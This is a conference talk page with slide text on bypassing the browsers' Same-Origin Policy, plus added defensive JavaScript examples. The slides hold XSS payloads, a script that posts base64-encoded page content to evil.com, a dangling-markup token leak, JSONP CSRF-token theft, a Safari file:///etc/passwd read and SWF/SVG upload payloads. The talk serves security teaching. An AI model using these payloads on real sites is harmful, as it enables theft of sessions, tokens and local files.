4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek

Jakub Żoczek

Language: Polish

During the talk you will learn the inner workings of one of the key security mechanisms in browsers, the Same-Origin Policy. Beyond the basics, we will look at various techniques that allow bypassing SOP and obtaining sensitive data from the domains we are interested in.


  1. Bypassing Same-Origin Policy
     Jakub Żoczek
     http://twitter.com/zoczus
     jakub.zoczek@allegrogroup.com
     zoczus@gmail.com
  2. $ whoami
     • Jakub Żoczek
     • IT Systems Security Specialist
     • Security Researcher
     • Bug Hunter
     • http://zoczus.blogspot.com
     • Hall of Fame:
  3. What is Same-Origin Policy?
  4. What is Same-Origin Policy?
     • Same domain
     • Same port
     • Same scheme
  5. What is Same-Origin Policy?
     For the page http://example.com:
     URL                                    Comment
     http://example.com/admin/index.php     (same origin)
     http://example.com/images/logo.png     (same origin)
     https://example.com/admin/panel        different scheme
     http://example.com:8080/example.html   different port
     http://admin.example.com/index.php     different domain
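The table above, worked through in code. This is an added example, not part of the talk: it builds the (scheme, host, port) triple by hand so the three rules on slide 4 are visible, normalises the default port, and re-checks every row of the slide's table plus two rows of our own (an explicit :80 and a look-alike host suffix) that the slide does not list.

```javascript
// Added example, not from the talk: compare two URLs the way the browser does.
// An origin is the (scheme, host, port) triple; an omitted port means the
// scheme's default, so http://example.com and http://example.com:80 match.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

function originOf(urlString) {
  const u = new URL(urlString);                        // throws on a malformed URL
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return `${u.protocol}//${u.hostname}:${port}`;       // hostname is already lower-cased
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// The slide's table for the page http://example.com, plus two rows of our own.
const BASE = "http://example.com";
const TABLE = [
  ["http://example.com/admin/index.php",   true,  "same origin"],
  ["http://example.com/images/logo.png",   true,  "same origin"],
  ["http://example.com:80/index.php",      true,  "explicit default port (our row)"],
  ["https://example.com/admin/panel",      false, "different scheme"],
  ["http://example.com:8080/example.html", false, "different port"],
  ["http://admin.example.com/index.php",   false, "different domain"],
  ["http://example.com.evil.org/",         false, "suffix match is not enough (our row)"],
];

// URLs where sameOrigin() disagrees with the table's verdict (expected: none).
function mismatches() {
  return TABLE.filter(([url, expected]) => sameOrigin(BASE, url) !== expected)
              .map(([url]) => url);
}

for (const [url, , why] of TABLE) {
  console.log((sameOrigin(BASE, url) ? "same " : "cross") + "  " + url + "  (" + why + ")");
}
```

`new URL(x).origin` gives the same answer for http and https in one call; spelling it out shows which of the three components differs, which is what the rest of the talk exploits one at a time.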
  6. What is Same-Origin Policy?
     Cross-origin content a page cannot read:
     • AJAX response
     • iframe content (document / window)
     • <script> content
     • <img> content
  7. What is Same-Origin Policy?
     Cross-origin resources a page may still embed:
     • <img src="(…)">
     • <script src="(…)">
     • <link href="(…)">
  8. Cross-Site Scripting
     <?php
     echo '<h1> Search results for: ' . $_GET['search'] . '</h1>';
     // (...)
     ?>
  9. Cross-Site Scripting
     /index.php?search=<script>alert(1);</script>
  10. Cross-Site Scripting
     <html>
     <body>
     <!-- (...) -->
     <script>
     // send the rendered page, base64-encoded, to the attacker's server
     x = new XMLHttpRequest();
     x.open("POST", "http://evil.com/log_data", true);
     x.send(btoa(document.body.innerHTML));
     </script>
  11. Cross-Site Scripting – file upload
     html / htm / shtml
     <html>
     <body>
     <script>alert('XSS');</script>
     </body>
     </html>
  12. Cross-Site Scripting – file upload
     xml / xsd / xsl / xhtml / rdf / svg / svgz
     <?xml version="1.0" standalone="no" ?>
     <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
     <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
       <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
       <script type="text/javascript"> alert('XSS'); </script>
     </svg>
  13. Cross-Site Scripting – file upload
     swf / swfl
     package {
       import flash.display.Sprite;
       import flash.external.ExternalInterface;   // needed for ExternalInterface.call
       public class xss extends Sprite {
         public function xss() {
           super();
           ExternalInterface.call("alert('XSS')");
           return;
         }
       }
     }
  14. HTML Injection
     <?php
     header("Content-Security-Policy: script-src 'self'; object-src 'self'; style-src 'self'");
     header("Content-type: text/html; charset=utf-8");
     $token = "2b9ee1db6d3989f5eec70e59ab211619";
     $str = $_GET['str'];   // attacker-controlled: the ?str= parameter seen in the slide-18 log
     echo "<br>XSS-free Content Here " . $str;
     echo "<br>Your token: " . $token;
     echo "<script>var x = 'test';</script>";
     echo "</body></html>";
     ?>
  15.-17. HTML Injection (image slides)
  18. HTML Injection
     root@ropchain:/var/log/apache2# cat access.log | grep token
     213.17.226.11 - - [15/Apr/2015:16:51:57 +0200] "GET /%3Cbr%3EYour%20token:%202b9ee1db6d3989f5eec70e59ab211619%3Cscript%3Evar%20x%20= HTTP/1.0" 404 553 "http://lab.ropchain.org/tmp/u.php?str=%3Cimg%20src=%27http://ropchain.org/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
     The unclosed <img src=' injected through ?str= turns everything up to the next single quote (the token and the start of the inline script) into the image URL, which the browser then requests from ropchain.org. No script has to execute, and the CSP on slide 14 has no default-src or img-src, so the image load is allowed.
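Slides 8-10 and 14-18 replayed offline. This is an added example, not the talk's code: the two PHP pages are rebuilt as JavaScript string templates, the reflected <script> payload and the dangling <img src=' payload are run through them, and the same attribute-aware escaping is applied as the fix. Assumptions: the injected value arrives via ?str= and the collecting server is http://ropchain.org/, both taken from the slide-18 log; the regex stands in for the one HTML tokenizer rule that matters here.

```javascript
// Added example, not from the talk: reflected XSS (slide 8) and dangling
// markup under CSP (slide 14) side by side, with the escaping that stops both.
const TOKEN = "2b9ee1db6d3989f5eec70e59ab211619";          // from slide 14

// Escape for HTML text and quoted attribute values. Encoding ' and " is what
// prevents an injected attribute from swallowing the markup that follows it.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Slide 8: the search page.
function renderSearch(query, escape) {
  return "<h1> Search results for: " + (escape ? escapeHtml(query) : query) + "</h1>";
}

// Slide 14: the CSP-protected page; the markup after $str is what leaks.
function renderTokenPage(str, escape) {
  return "<br>XSS-free Content Here " + (escape ? escapeHtml(str) : str) +
         "<br>Your token: " + TOKEN +
         "<script>var x = 'test';</script>" +
         "</body></html>";
}

// Tokenizer rule modelled here: after <img src=' the parser takes everything
// up to the next ' as the attribute value, tags and text included.
function danglingImgSrc(html) {
  const m = /<img src='([^']*)'/.exec(html);
  return m ? m[1] : null;
}

// What ropchain.org's access log records: the path the browser requests.
// WHATWG URL parsing percent-encodes < > and space and drops trailing spaces.
function requestedPath(src) {
  return new URL(src).pathname;
}

const XSS_PAYLOAD      = "<script>alert(1);</script>";     // slide 9
const DANGLING_PAYLOAD = "<img src='http://ropchain.org/"; // slide-18 referrer, decoded

function xssReachesPage()       { return renderSearch(XSS_PAYLOAD, false).includes(XSS_PAYLOAD); }
function xssEscaped()           { return !renderSearch(XSS_PAYLOAD, true).includes("<script"); }
function leakedPathVulnerable() { return requestedPath(danglingImgSrc(renderTokenPage(DANGLING_PAYLOAD, false))); }
function leakedPathFixed()      { return danglingImgSrc(renderTokenPage(DANGLING_PAYLOAD, true)); } // null: no open <img src='

console.log("vulnerable page, path requested from ropchain.org:", leakedPathVulnerable());
console.log("escaped page, dangling src found:", leakedPathFixed());
```

The vulnerable run reproduces the request line from the slide-18 log; the escaped run leaves no unclosed attribute for the parser to extend, so the token stays on the page.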
  19. JSON
     http://hostname/whoami
     {
       "logged_in": true,
       "login": "victim",
       "csrf": "46aa3b5901c2b41c90ad5de62ee1b2ba"
     }
  20. JSON
     http://evil.com
     <script src="http://hostname/whoami"></script>
  21. JSONP
     http://hostname/whoami?callback=xx
     xx({
       "logged_in": true,
       "login": "victim",
       "csrf": "46aa3b5901c2b41c90ad5de62ee1b2ba"
     });
  22. JSONP
     http://evil.com
     <script>xx = function (x) { alert(x.csrf); }</script>
     <script src="http://hostname/whoami?callback=xx"></script>
  23. Access-Control-Allow-Origin
     HTTP/1.0 200 OK
     Date: Thu, 16 Apr 2015 08:50:19 GMT
     Server: Apache/2.2.22 (Debian)
     Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
     Accept-Ranges: bytes
     Vary: Accept-Encoding
     Access-Control-Allow-Origin: http://lab.ropchain.org
     Content-Encoding: gzip
     Content-Length: 1509
     Content-Type: text/html; charset=utf-8
  24. Access-Control-Allow-Origin
     The same response with the header replaced by:
     Access-Control-Allow-Origin: *
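Both sides of the CORS decision behind slides 23-24. This is an added example, not the talk's code: a server function that answers only for an allowlist (the allowlist itself is an assumption built from the slide-23 header), the wildcard variant from slide 24, the origin-reflecting variant that the talk does not show but that is the common way this header goes wrong, and a browser-side function implementing the access check that decides whether script on the requesting page may read the response.

```javascript
// Added example, not from the talk: server and browser halves of CORS.
const ALLOWED_ORIGINS = new Set(["http://lab.ropchain.org"]);   // assumption, from slide 23

// Hardened server: echo only a known origin and tell caches that the answer
// depends on the Origin header. An unknown origin gets no ACAO at all.
function corsHeaders(requestOrigin, { credentials = false } = {}) {
  const h = { "Vary": "Origin" };
  if (!requestOrigin || !ALLOWED_ORIGINS.has(requestOrigin)) return h;
  h["Access-Control-Allow-Origin"] = requestOrigin;
  if (credentials) h["Access-Control-Allow-Credentials"] = "true";
  return h;
}

// Slide 24: the wildcard. Any page may read the response, but only for requests
// sent without credentials; browsers reject "*" when cookies are included.
function wildcardHeaders() {
  return { "Access-Control-Allow-Origin": "*" };
}

// The genuinely dangerous pattern: reflect whatever Origin arrived and allow
// credentials, which hands authenticated responses to any site.
function reflectingHeaders(requestOrigin) {
  return { "Access-Control-Allow-Origin": requestOrigin,
           "Access-Control-Allow-Credentials": "true" };
}

// Browser side: may script running on pageOrigin read this response?
// (CORS access check for a simple request; preflight is not modelled.)
function browserAllowsRead(headers, pageOrigin, withCredentials) {
  const acao = headers["Access-Control-Allow-Origin"];
  if (acao === undefined) return false;
  if (!withCredentials) return acao === "*" || acao === pageOrigin;
  return acao === pageOrigin && headers["Access-Control-Allow-Credentials"] === "true";
}

const EVIL = "http://evil.com";
console.log("allowlist, evil.com with cookies:", browserAllowsRead(corsHeaders(EVIL), EVIL, true));
console.log("wildcard, evil.com without cookies:", browserAllowsRead(wildcardHeaders(), EVIL, false));
console.log("wildcard, evil.com with cookies:", browserAllowsRead(wildcardHeaders(), EVIL, true));
console.log("reflected origin, evil.com with cookies:", browserAllowsRead(reflectingHeaders(EVIL), EVIL, true));
```

A wildcard is therefore only a problem where the content is sensitive yet not cookie-gated (intranet hosts, IP-based access control); the reflected-origin-plus-credentials form leaks logged-in content outright. Never put "null" on the allowlist either: sandboxed iframes and local files send Origin: null.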
  25. (image slide)
  26. Safari
  27. (image slide)
  28. Safari
     <iframe src="http://wp.pl/" onload="alert(frames[0].document.cookie)"></iframe>
  29. (image slide)
  30. Safari
     <script>
     var x = new XMLHttpRequest();
     x.onreadystatechange = function () {
       if (x.readyState === 4) document.body.innerText = x.response;
     };
     x.open("GET", "file:///etc/passwd", true);
     x.send();
     </script>
  31. (image slide)
  32. Flash
  33. Flash – crossdomain.xml
     http://domain.com/crossdomain.xml
     <?xml version="1.0" encoding="UTF-8"?>
     <cross-domain-policy>
       <allow-access-from domain="*.domain.com" secure="false"/>
     </cross-domain-policy>
  34. Flash – crossdomain.xml
     http://domain.com/crossdomain.xml
     <?xml version="1.0" encoding="UTF-8"?>
     <cross-domain-policy>
       <allow-access-from domain="*" secure="false"/>
     </cross-domain-policy>
  35. Flash – crossdomain.xml
     (the slide-33 policy again: domain="*.domain.com" secure="false")
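A checker for the policies on slides 33-35. This is an added example, not the talk's code: it pulls every allow-access-from rule out of a crossdomain.xml body and reports the settings the talk goes on to exploit. The extraction is a regex scan of the element form shown on the slides, not a full XML parser, so the element and attribute shapes it expects are an assumption; the sample policies are constructed copies of the slides.

```javascript
// Added example, not from the talk: audit crossdomain.xml for the rules the
// talk abuses: domain="*", subdomain wildcards, and secure="false".
function allowAccessFromRules(xml) {
  const rules = [];
  const elem = /<allow-access-from\b([^>]*?)\/?>/g;
  const attr = /([\w-]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = elem.exec(xml)) !== null) {
    const a = {};
    for (const [, k, v] of m[1].matchAll(attr)) a[k] = v;
    rules.push(a);
  }
  return rules;
}

// siteIsHttps: the policy is served over https, where secure="false" additionally
// lets SWFs loaded over plain http read the https responses.
function auditCrossdomain(xml, siteIsHttps = true) {
  const findings = [];
  for (const r of allowAccessFromRules(xml)) {
    const d = r.domain || "";
    if (d === "*") {
      findings.push('domain="*": a SWF hosted anywhere can read this domain with the victim\'s cookies');
    } else if (d.startsWith("*.")) {
      findings.push(`domain="${d}": every subdomain is trusted; an XSS or an uploaded SWF on any of them reads this domain`);
    }
    if (siteIsHttps && r.secure === "false") {
      findings.push(`secure="false" (domain="${d}"): SWFs loaded over http may read https content`);
    }
  }
  return findings;
}

// Constructed copies of the slide policies.
const SLIDE_34 = `<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>`;
const SLIDE_33 = SLIDE_34.replace('domain="*"', 'domain="*.domain.com"');
const SAFER = `<cross-domain-policy>
  <allow-access-from domain="www.domain.com"/>
</cross-domain-policy>`;

for (const [name, xml] of [["slide 33", SLIDE_33], ["slide 34", SLIDE_34], ["explicit host", SAFER]]) {
  console.log(name + ":", auditCrossdomain(xml));
}
```

The subdomain wildcard is the finding to take seriously on large estates: the etsy and PayPal demos that follow both start from one weak host that the wildcard made equivalent to the main domain.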
  36. http://etsy.com - demo
     https://www.youtube.com/watch?v=yuOiDqpxKow
  37. Flash – Security.allowDomain("*")
  38. Flash – Security.allowDomain("*")
     SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
     • Security.allowDomain("*")
     • We control the upload URL
     • We control the callback that receives the upload-status response
     • In the callback we receive the content of the fetched document
     • …
     • PROFIT!
  39. Flash – Security.allowDomain("*")
     SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
     private function UploadSuccess(file: FileItem, serverData: String, responseReceived: Boolean = true): void {
       // (…)
       ExternalCall.UploadSuccess(this.uploadSuccess_Callback, file.ToJavaScriptObject(), serverData, responseReceived);
       this.UploadComplete(false);
     }
  40. Flash – Security.allowDomain("*")
     www.paypal.com/crossdomain.xml:
     <?xml version="1.0"?>
     <!-- (...) -->
     <cross-domain-policy>
       <allow-access-from domain="*.paypal.com" />
       <allow-access-from domain="*.paypalobjects.com" />
     </cross-domain-policy>
     advertising.paypal.com/(...)/swfupload.swf - VULNERABLE :-)
  41. http://paypal.com - demo
     https://www.youtube.com/watch?v=-3Qgwi9rAfY
  42. public function cleanEIString(arg1: String): String {
       return arg1.replace(new RegExp("[^A-Za-z0-9_.]", "gi"), "");
     }
     // (…)
     if (loaderInfo.parameters.readyFunction != undefined) {
       ExternalInterface.call(_app.model.cleanEIString(readyFunction), ExternalInterface.objectID);
     }
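What the slide-42 filter does and does not stop, ahead of the Same Origin Method Execution slides. This is an added example, not the talk's code: the ActionScript sanitizer is ported to JavaScript with its regex unchanged, and placed next to an allowlist check, the form that actually prevents an attacker-chosen readyFunction from selecting a method in the page. The callback names in ALLOWED and the sample inputs are assumptions for illustration.

```javascript
// Added example, not from the talk: the slide-42 sanitizer ported verbatim,
// beside the allowlist that stops Same Origin Method Execution.

// Port of cleanEIString from slide 42 (same regex). It strips anything that is
// not a letter, digit, underscore or dot.
function cleanEIString(arg1) {
  return arg1.replace(new RegExp("[^A-Za-z0-9_.]", "gi"), "");
}

// Strict: readyFunction may only name a callback the page really ships.
// Dotted paths into the DOM are never executed.
const ALLOWED = new Set(["swfReady", "swfFailed"]);   // assumed page callbacks

function pickCallback(readyFunction) {
  return typeof readyFunction === "string" && ALLOWED.has(readyFunction) ? readyFunction : null;
}

// ExternalInterface.call(name, objectID) evaluates name(objectID) in the page,
// so name is whatever survives the filter. Compare both filters on each input.
function survivors(input) {
  return { input, cleaned: cleanEIString(input), strict: pickCallback(input) };
}

const SAMPLES = [
  "swfReady",                                      // the legitimate callback
  "alert(document.cookie)",                        // direct injection: the regex mangles it
  "parent.document.body.firstElementChild.click",  // dotted path: the regex passes it untouched
];

for (const s of SAMPLES) console.log(survivors(s));
```

The regex removes parentheses, so the attacker cannot pass arguments, but it keeps dots, so any method reachable from the page's window by a dotted path can still be named and invoked in the page's origin; that is exactly the primitive SOME builds on. An allowlist of the callbacks the page defines removes the choice entirely.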
  43. SAME ORIGIN METHOD EXECUTION
  44.-48. Same Origin Method Execution (image slides)
  49. http://yammer.com - demo
     https://www.youtube.com/watch?v=J0f_sKpUak0
  50. Questions?
     Jakub Żoczek (jakub.zoczek@allegrogroup.com)
     http://zoczus.blogspot.com
     http://twitter.com/
